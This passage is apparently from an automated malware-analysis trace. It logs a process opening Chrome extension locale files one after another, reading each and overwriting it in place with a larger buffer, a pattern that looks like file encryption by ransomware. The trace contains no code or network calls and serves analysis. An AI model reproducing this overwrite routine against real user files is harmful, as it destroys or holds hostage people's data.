lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x110 [0158.927] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.928] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.928] ReleaseMutex (hMutex=0x168) returned 1 [0158.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0158.928] ReadFile (in: hFile=0x210, lpBuffer=0x1ef1ef8, nNumberOfBytesToRead=0x110, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1ef8*, lpNumberOfBytesRead=0x359f2bc*=0x110, lpOverlapped=0x0) returned 1 [0158.929] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.929] WriteFile (in: hFile=0x210, lpBuffer=0x28956c8*, nNumberOfBytesToWrite=0x698, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28956c8*, lpNumberOfBytesWritten=0x359f2d0*=0x698, lpOverlapped=0x0) returned 1 [0158.929] CloseHandle (hObject=0x210) returned 1 [0158.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.930] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.484] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xdf [0159.484] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.484] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.484] ReleaseMutex (hMutex=0x168) returned 1 [0159.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.485] ReadFile (in: hFile=0x210, lpBuffer=0x26c4d78, nNumberOfBytesToRead=0xdf, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4d78*, lpNumberOfBytesRead=0x359f2bc*=0xdf, lpOverlapped=0x0) returned 1 [0159.486] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.486] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x667, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x667, lpOverlapped=0x0) returned 1 [0159.487] CloseHandle (hObject=0x210) returned 1 [0159.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.488] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.488] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe6 [0159.489] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.489] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.489] ReleaseMutex (hMutex=0x168) returned 1 [0159.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.489] ReadFile (in: hFile=0x210, lpBuffer=0x2697308, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x359f2bc*=0xe6, lpOverlapped=0x0) returned 1 [0159.491] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.491] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x66e, lpOverlapped=0x0) returned 1 [0159.491] CloseHandle (hObject=0x210) returned 1 [0159.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.493] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.493] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xdd [0159.493] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.493] ReleaseMutex (hMutex=0x168) returned 1 [0159.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.494] ReadFile (in: hFile=0x210, lpBuffer=0x26c4d78, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4d78*, lpNumberOfBytesRead=0x359f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0159.495] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.495] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x665, lpOverlapped=0x0) returned 1 [0159.496] CloseHandle (hObject=0x210) returned 1 [0159.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.497] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.497] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xdf [0159.497] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.498] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.498] ReleaseMutex (hMutex=0x168) returned 1 [0159.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.498] ReadFile (in: hFile=0x210, lpBuffer=0x26c4d78, nNumberOfBytesToRead=0xdf, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4d78*, lpNumberOfBytesRead=0x359f2bc*=0xdf, lpOverlapped=0x0) returned 1 [0159.499] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.500] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x667, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x667, lpOverlapped=0x0) returned 1 [0159.500] CloseHandle (hObject=0x210) returned 1 [0159.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.501] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.501] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xd1 [0159.502] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.502] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.502] ReleaseMutex (hMutex=0x168) returned 1 [0159.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.502] ReadFile (in: hFile=0x210, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd1, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x359f2bc*=0xd1, lpOverlapped=0x0) returned 1 [0159.503] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.504] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x659, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x659, lpOverlapped=0x0) returned 1 [0159.504] CloseHandle (hObject=0x210) returned 1 [0159.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.510] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.510] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xf6 [0159.510] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.510] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.510] ReleaseMutex (hMutex=0x168) returned 1 [0159.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.510] ReadFile (in: hFile=0x210, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xf6, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x359f2bc*=0xf6, lpOverlapped=0x0) returned 1 [0159.511] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.511] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x67e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x67e, lpOverlapped=0x0) returned 1 [0159.512] CloseHandle (hObject=0x210) returned 1 [0159.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.513] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.513] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xd1 [0159.513] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.513] ReleaseMutex (hMutex=0x168) returned 1 [0159.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.513] ReadFile (in: hFile=0x210, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd1, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x359f2bc*=0xd1, lpOverlapped=0x0) returned 1 [0159.515] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.515] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x659, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x659, lpOverlapped=0x0) returned 1 [0159.515] CloseHandle (hObject=0x210) returned 1 [0159.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.516] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.516] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x117 [0159.516] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.516] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.516] ReleaseMutex (hMutex=0x168) returned 1 [0159.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.517] ReadFile (in: hFile=0x210, lpBuffer=0x25a4028, nNumberOfBytesToRead=0x117, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a4028*, lpNumberOfBytesRead=0x359f2bc*=0x117, lpOverlapped=0x0) returned 1 [0159.518] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.518] WriteFile (in: hFile=0x210, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x69f, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x359f2d0*=0x69f, lpOverlapped=0x0) returned 1 [0159.518] CloseHandle (hObject=0x210) returned 1 [0159.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.519] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.519] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xcf [0159.520] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.520] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.520] ReleaseMutex (hMutex=0x168) returned 1 [0159.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.520] ReadFile (in: hFile=0x210, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x359f2bc*=0xcf, lpOverlapped=0x0) returned 1 [0159.521] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0159.521] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x657, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x657, lpOverlapped=0x0) returned 1 [0159.522] CloseHandle (hObject=0x210) returned 1 [0159.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0159.523] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.523] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xdd [0159.523] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0159.523] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.523] ReleaseMutex (hMutex=0x168) returned 1 [0159.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, 